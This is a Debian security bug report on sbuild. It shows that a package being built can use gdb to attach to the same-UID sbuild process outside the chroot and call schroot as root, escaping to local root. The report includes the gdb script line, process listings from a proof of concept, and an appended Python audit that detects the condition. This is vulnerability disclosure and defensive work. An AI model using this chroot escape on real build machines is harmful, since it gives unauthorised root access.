Ansgar Burchardt
2012-Feb-23 18:37 UTC
[Secure-testing-team] Bug#661037: process building package can escape from chroot and gain local root
Package: sbuild
Version: 0.62.6-1
Severity: important
Tags: security

When building a package with sbuild, the processes running in the chroot can escape from there and gain local root.

This is possible as the processes in- and outside of the chroot environment run under the same user id and the outside process can run commands as root in the chroot environment.

To be precise, a malicious package could for example use gdb to attach to the outside process and then execute something along the lines of system("schroot -u root -c [known-chroot-name] [some-command]").

An example package doing so is attached (it needs procps installed in the chroot):

====================================================================
[...]
1001 12772 \_ /usr/bin/perl /usr/bin/sbuild -j12 -d unstable -A sbuild-to-root_1.dsc
1001 12779 \_ package log for sbuild-to-root_1_amd64
root 13988 \_ schroot -d /?PKGBUILDDIR? -c unstable-amd64-sbuild-0fda4b02-2706-4743-8931-1c77cac39d9c --run-session -q -u sbuild-user -p -- dpkg-buildpackage -us -uc -b -rfakeroot -j12
1001 13989 \_ /usr/bin/perl /usr/bin/dpkg-buildpackage -us -uc -b -rfakeroot -j12
1001 14041 \_ /usr/bin/make -f debian/rules build
1001 14042 \_ /usr/bin/perl -w /usr/bin/dh build
1001 14051 \_ /usr/bin/make -f debian/rules override_dh_auto_build
1001 14052 \_ /bin/sh ./sbuild-to-root
1001 14053 \_ ps axfu
[...]
Will try using 12772...
Guessed chroot name: unstable-amd64-sbuild
--- gdb-script -----------------------
p system("cd /; schroot -u root -c unstable-amd64-sbuild ps axfu")
detach
--------------------------------------
[...]
1001 12772 \_ /usr/bin/perl /usr/bin/sbuild -j12 -d unstable -A sbuild-to-root_1.dsc
1001 12779 \_ package log for sbuild-to-root_1_amd64
root 13988 \_ schroot -d /?PKGBUILDDIR? -c unstable-amd64-sbuild-0fda4b02-2706-4743-8931-1c77cac39d9c --run-session -q -u sbuild-user -p -- dpkg-buildpackage -us -uc -b -rfakeroot -j12
1001 13989 | \_ /usr/bin/perl /usr/bin/dpkg-buildpackage -us -uc -b -rfakeroot -j12
1001 14041 | \_ /usr/bin/make -f debian/rules build
1001 14042 | \_ /usr/bin/perl -w /usr/bin/dh build
1001 14051 | \_ /usr/bin/make -f debian/rules override_dh_auto_build
1001 14052 | \_ /bin/sh ./sbuild-to-root
1001 14068 | \_ gdb -batch -x gdb-script /usr/bin/perl 12772
1001 14072 \_ sh -c cd /; schroot -u root -c unstable-amd64-sbuild ps axfu
root 14073 \_ schroot -u root -c unstable-amd64-sbuild ps axfu
root 14169 \_ /bin/ps axfu
[...]
====================================================================

As building untrusted packages is not a good idea anyway, I don't think this issue is grave, however it would still be nice if there was an option to run the processes inside the chroot under a different userid.

Regards,
Ansgar

-- System Information:
Debian Release: wheezy/sid
  APT prefers testing
  APT policy: (500, 'testing'), (100, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 3.2.0-1-amd64 (SMP w/12 CPU cores)
Locale: LANG=C, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages sbuild depends on:
ii  adduser         3.113+nmu1
ii  apt-utils       0.8.15.9
ii  libsbuild-perl  0.62.6-1
ii  perl            5.14.2-7
ii  perl-modules    5.14.2-7

Versions of packages sbuild recommends:
ii  debootstrap  1.0.38
ii  fakeroot     1.18.2-1

Versions of packages sbuild suggests:
ii  deborphan  <none>
ii  wget       1.13.4-2

-- no debconf information

-------------- next part --------------
A non-text attachment was scrubbed...
Name: sbuild-to-root_1.tar.gz
Type: application/x-gzip
Size: 1386 bytes
Desc: not available
URL: <http://lists.alioth.debian.org/pipermail/secure-testing-team/attachments/20120223/811e38e9/attachment.bin>
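
Added example, not part of the original report and not sbuild code: a process-table audit that flags the condition described above, where build-session processes share a UID with the sbuild driver outside the chroot. The sample rows are constructed from the report's second listing; the PPID column, the abbreviated session command and the function names are assumptions.

```python
import shlex

# Constructed sample: UID, PID and command come from the second process listing
# in the report (session command abbreviated); the PPID column is an assumption
# read off the tree markers.
PROCS = [
    ("1001", 12772, 1, "/usr/bin/perl /usr/bin/sbuild -j12 -d unstable -A sbuild-to-root_1.dsc"),
    ("root", 13988, 12772, "schroot -c unstable-amd64-sbuild-SESSION --run-session -q -u sbuild-user -p -- dpkg-buildpackage -b"),
    ("1001", 13989, 13988, "/usr/bin/perl /usr/bin/dpkg-buildpackage -us -uc -b -rfakeroot -j12"),
    ("1001", 14052, 13989, "/bin/sh ./sbuild-to-root"),
    ("1001", 14068, 14052, "gdb -batch -x gdb-script /usr/bin/perl 12772"),
    ("1001", 14072, 12772, "sh -c cd /; schroot -u root -c unstable-amd64-sbuild ps axfu"),
    ("root", 14073, 14072, "schroot -u root -c unstable-amd64-sbuild ps axfu"),
    ("root", 14169, 14073, "/bin/ps axfu"),
]

def ancestors(pid, by_pid):
    """Return the PIDs above `pid` that are present in the table, nearest first."""
    chain = []
    while pid in by_pid and by_pid[pid][2] in by_pid:
        pid = by_pid[pid][2]
        chain.append(pid)
    return chain

def audit(procs):
    """Flag build-session processes that share a UID with processes outside the session."""
    by_pid = {p[1]: p for p in procs}
    sessions = {p[1] for p in procs
                if p[3].startswith("schroot ") and "--run-session" in p[3]}
    exposed, attaches, root_runs = set(), [], []
    for uid, pid, _ppid, cmd in procs:
        session = next((a for a in ancestors(pid, by_pid) if a in sessions), None)
        if session is not None:
            # Inside the build session: which outside ancestors run under the same UID?
            same_uid = {a for a in ancestors(session, by_pid) if by_pid[a][0] == uid}
            exposed |= same_uid
            argv = shlex.split(cmd)
            if argv[0].endswith("gdb"):
                # Debugger inside the session pointed at a same-UID outside PID.
                attaches += [(pid, int(a)) for a in argv[1:]
                             if a.isdigit() and int(a) in same_uid]
        elif uid == "root" and pid not in sessions \
                and cmd.startswith("schroot ") and "-u root" in cmd:
            # A root schroot run that is not itself a build session.
            root_runs.append(pid)
    return {"exposed": sorted(exposed), "attaches": attaches, "root_runs": root_runs}
```

With the build processes moved to a UID of their own, as the report requests, `exposed` and `attaches` come back empty for the same tree.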